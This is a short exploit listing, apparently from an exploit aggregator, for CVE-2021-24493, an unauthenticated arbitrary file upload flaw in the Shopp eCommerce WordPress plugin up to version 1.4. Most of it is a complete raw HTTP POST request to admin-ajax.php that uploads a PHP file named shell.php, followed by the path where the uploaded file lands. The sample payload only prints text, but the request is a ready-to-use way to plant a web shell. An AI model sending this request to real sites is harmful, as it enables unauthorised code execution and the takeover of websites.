Exploit for Shopp eCommerce <= 1.4 - Unauthenticated Arbitrary File Upload CVE-2021-24493

## https://sploitus.com/exploit?id=WPEX-ID:DCC7BE04-550B-427A-A14F-A2365D96A00E
https://www.youtube.com/watch?v=Y4dHEk2mWLw

POST /wp-admin/admin-ajax.php?action=shopp_upload_file HTTP/1.1
Accept: application/json
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------2167174666627501894262091506
Content-Length: 499
Connection: close

-----------------------------2167174666627501894262091506
Content-Disposition: form-data; name="dzchunkindex"

0
-----------------------------2167174666627501894262091506
Content-Disposition: form-data; name="dztotalchunkcount"

1
-----------------------------2167174666627501894262091506
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream

<?php
echo 'Failed';
?>

-----------------------------2167174666627501894262091506--


Uploaded file will be at https://example.com/wp-content/uploads/shell.php